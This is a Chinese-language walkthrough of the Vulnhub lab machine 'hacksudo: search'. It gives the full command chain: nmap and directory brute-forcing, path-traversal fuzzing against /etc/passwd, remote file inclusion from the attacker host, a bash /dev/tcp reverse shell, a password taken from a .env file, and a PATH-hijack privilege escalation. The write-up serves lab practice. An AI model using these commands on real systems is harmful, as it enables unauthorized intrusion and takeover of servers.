Vulnhub: hacksudo: search靶机

kali:192.168.111.111

靶机:192.168.111.170

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.170

Vulnhub: hacksudo: search靶机_第1张图片

80端口目录爆破

feroxbuster -k -d 1 --url http://192.168.111.170 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf -t 1 -C 404,500

Vulnhub: hacksudo: search靶机_第2张图片

查看search1.php源码

Vulnhub: hacksudo: search靶机_第3张图片

漏洞利用

猜测该页面存在文件包含,利用wfuzz爆破参数名

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 2918 http://192.168.111.170/search1.php?FUZZ=../../../../../../../../../../../../../../etc/passwd

Vulnhub: hacksudo: search靶机_第4张图片

同时发现目标存在远程文件包含

http://192.168.111.170/search1.php?me=http://192.168.111.111:8000/b.php&cmd=id

Vulnhub: hacksudo: search靶机_第5张图片

之后执行反弹shell

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/5555 0>&1'

Vulnhub: hacksudo: search靶机_第6张图片

提权

/var/www/html/.env文件中发现hacksudo用户的密码

Vulnhub: hacksudo: search靶机_第7张图片

Vulnhub: hacksudo: search靶机_第8张图片

查找suid权限的文件

find / -perm -u=s 2> /dev/null

Vulnhub: hacksudo: search靶机_第9张图片

/home/hacksudo/search/tools/该目录下存在该程序的源码

Vulnhub: hacksudo: search靶机_第10张图片

发现该程序会执行install命令,修改环境变量提权

echo '/bin/bash' > /tmp/install
chmod 777 /tmp/install
export PATH=/tmp:$PATH
./searchinstall

Vulnhub: hacksudo: search靶机_第11张图片

flag

Vulnhub: hacksudo: search靶机_第12张图片

你可能感兴趣的:(安全,web安全,网络安全)